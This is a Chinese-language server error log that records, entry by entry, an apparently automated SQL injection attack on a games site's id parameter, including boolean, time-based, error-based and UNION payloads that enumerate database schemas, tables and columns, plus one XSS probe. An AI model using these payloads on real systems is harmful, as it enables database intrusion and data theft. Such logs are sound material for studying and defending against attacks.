错误SQL语句：
SELECT * FROM games  Where status=1 AND id='53''
客户IP:111.74.215.73
时间 :2016-01-26 01:33:29

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10,"(,')')".'
客户IP:111.74.215.73
时间 :2016-01-26 01:34:33

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'oboh<'">jbUE'
客户IP:111.74.215.73
时间 :2016-01-26 01:34:34

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10') AND 7722=7615 AND ('mYnf'='mYnf'
客户IP:111.74.215.73
时间 :2016-01-26 01:34:46

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10') AND 1742=1742 AND ('hoCc'='hoCc'
客户IP:111.74.215.73
时间 :2016-01-26 01:34:47

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1071 FROM(SELECT COUNT(*),CONCAT(0x716b786b71,(SELECT (ELT(1071=1071,1))),0x716a627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SGkS'='SGkS'
客户IP:111.74.215.73
时间 :2016-01-26 01:34:52

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10';(SELECT * FROM (SELECT(SLEEP(5)))XABV)#'
客户IP:111.74.215.73
时间 :2016-01-26 01:35:01

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' ORDER BY 3070-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:35:09

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='53'<>'
客户IP:111.74.215.73
时间 :2016-01-26 01:35:09

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' ORDER BY 20-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:35:15

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='53'<script>alert(/xss/)</script>'
客户IP:111.74.215.73
时间 :2016-01-26 01:35:29

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10.'.,''(,,,'
客户IP:111.74.215.73
时间 :2016-01-26 01:36:59

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'txZA<'">ktnW'
客户IP:111.74.215.73
时间 :2016-01-26 01:37:00

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10') AND 2329=4144 AND ('vUin'='vUin'
客户IP:111.74.215.73
时间 :2016-01-26 01:37:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10') AND 3017=3017 AND ('psnj'='psnj'
客户IP:111.74.215.73
时间 :2016-01-26 01:37:06

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 8141 FROM(SELECT COUNT(*),CONCAT(0x716b6b7071,(SELECT (ELT(8141=8141,1))),0x716b707071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'SaKo'='SaKo'
客户IP:111.74.215.73
时间 :2016-01-26 01:37:07

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10';(SELECT * FROM (SELECT(SLEEP(5)))uLaG)#'
客户IP:111.74.215.73
时间 :2016-01-26 01:37:12

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' ORDER BY 2643-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:37:23

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' ORDER BY 20-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:37:24

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10"(,,.'(,))'
客户IP:111.74.215.74
时间 :2016-01-26 01:38:39

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10'JuhR<'">ArTI'
客户IP:111.74.215.73
时间 :2016-01-26 01:38:39

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10') AND 6102=3211 AND ('wMMo'='wMMo'
客户IP:111.74.215.73
时间 :2016-01-26 01:38:57

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10') AND 7712=7712 AND ('Zwrt'='Zwrt'
客户IP:111.74.215.73
时间 :2016-01-26 01:38:58

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 2119 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT (ELT(2119=2119,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lPTH'='lPTH'
客户IP:111.74.215.73
时间 :2016-01-26 01:39:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10';(SELECT * FROM (SELECT(SLEEP(5)))OcwO)#'
客户IP:111.74.215.73
时间 :2016-01-26 01:39:19

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' ORDER BY 5826-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:39:25

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' ORDER BY 20-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:39:27

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-6929' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:41:50

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6761 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rhTV'='rhTV'
客户IP:111.74.215.73
时间 :2016-01-26 01:41:50

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 8535 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'LsEv'='LsEv'
客户IP:111.74.215.73
时间 :2016-01-26 01:41:51

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 8741 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 1,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kQLO'='kQLO'
客户IP:111.74.215.73
时间 :2016-01-26 01:41:51

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 3456 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 2,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'kmfL'='kmfL'
客户IP:111.74.215.73
时间 :2016-01-26 01:41:52

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 2012 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 3,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eUhF'='eUhF'
客户IP:111.74.215.73
时间 :2016-01-26 01:41:52

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4102 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 4,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'lbru'='lbru'
客户IP:111.74.215.73
时间 :2016-01-26 01:41:53

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 5579 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(schema_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 5,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KvzG'='KvzG'
客户IP:111.74.215.73
时间 :2016-01-26 01:41:54

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-1160' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(CURRENT_USER() AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:42:16

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 7196 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,50)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'xXlh'='xXlh'
客户IP:111.74.215.73
时间 :2016-01-26 01:42:17

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-6379' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:51:15

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-5520' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x3130303836686f746c696e65)-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:51:42

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6116 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x3130303836686f746c696e65)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tQxi'='tQxi'
客户IP:111.74.215.73
时间 :2016-01-26 01:51:43

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 8015 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x3130303836686f746c696e65) LIMIT 0,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PVuB'='PVuB'
客户IP:111.74.215.73
时间 :2016-01-26 01:51:43

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 2067 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x3130303836686f746c696e65) LIMIT 1,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JENF'='JENF'
客户IP:111.74.215.73
时间 :2016-01-26 01:51:43

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 5493 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x3130303836686f746c696e65) LIMIT 2,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'otDX'='otDX'
客户IP:111.74.215.73
时间 :2016-01-26 01:51:47

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 3121 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x3130303836686f746c696e65) LIMIT 3,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'DJEl'='DJEl'
客户IP:111.74.215.73
时间 :2016-01-26 01:51:48

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-3225' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(*) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:52:11

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1150 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT IFNULL(CAST(COUNT(*) AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'loOq'='loOq'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:11

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6176 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 0,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HkCh'='HkCh'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:11

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 8135 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 0,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'CWlh'='CWlh'
客户IP:111.74.215.71
时间 :2016-01-26 01:52:12

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6400 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 1,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Hzzw'='Hzzw'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:13

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6431 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 1,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'Mgks'='Mgks'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:17

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4595 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 2,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'tcYp'='tcYp'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:18

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 8307 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 2,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AAHo'='AAHo'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:18

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 8840 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 3,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'JbTi'='JbTi'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:26

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1884 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 3,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'oSFX'='oSFX'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:27

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 3207 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 4,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'PdaG'='PdaG'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:27

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 9091 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 4,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ZwrS'='ZwrS'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:28

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 3997 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 5,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gGLw'='gGLw'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:29

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4369 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 5,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'QXBU'='QXBU'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:30

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 2405 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 6,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nGet'='nGet'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:31

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 5231 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 6,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eIHV'='eIHV'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:31

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 5377 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 7,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'eHHA'='eHHA'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:32

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 7797 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 7,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'oJVC'='oJVC'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:35

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1210 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 8,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'KQba'='KQba'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:35

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4798 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 8,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'VypA'='VypA'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:36

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4693 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 9,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'dMVe'='dMVe'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:39

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6674 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 9,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'thNj'='thNj'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:41

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1945 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 10,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ORzX'='ORzX'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:41

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6399 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 10,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GsyZ'='GsyZ'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:42

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6250 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 11,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'rjaO'='rjaO'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:51

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 6364 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6361736573 AND table_schema=0x3130303836686f746c696e65 LIMIT 11,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'AwkF'='AwkF'
客户IP:111.74.215.73
时间 :2016-01-26 01:52:51

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-8528' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(schema_name) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.SCHEMATA-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:53:14

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='-5762' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b707171,IFNULL(CAST(COUNT(table_name) AS CHAR),0x20),0x7176707171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x68756973656e)-- '
客户IP:111.74.215.73
时间 :2016-01-26 01:54:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 1370 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x68756973656e)),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'YRwP'='YRwP'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:02

错误SQL语句：
SELECT * FROM games  Where status=1 AND id='10' AND (SELECT 4933 FROM(SELECT COUNT(*),CONCAT(0x716b707171,(SELECT MID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x68756973656e) LIMIT 0,1),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'gmdw'='gmdw'
客户IP:111.74.215.73
时间 :2016-01-26 01:54:02

错误SQL语句：
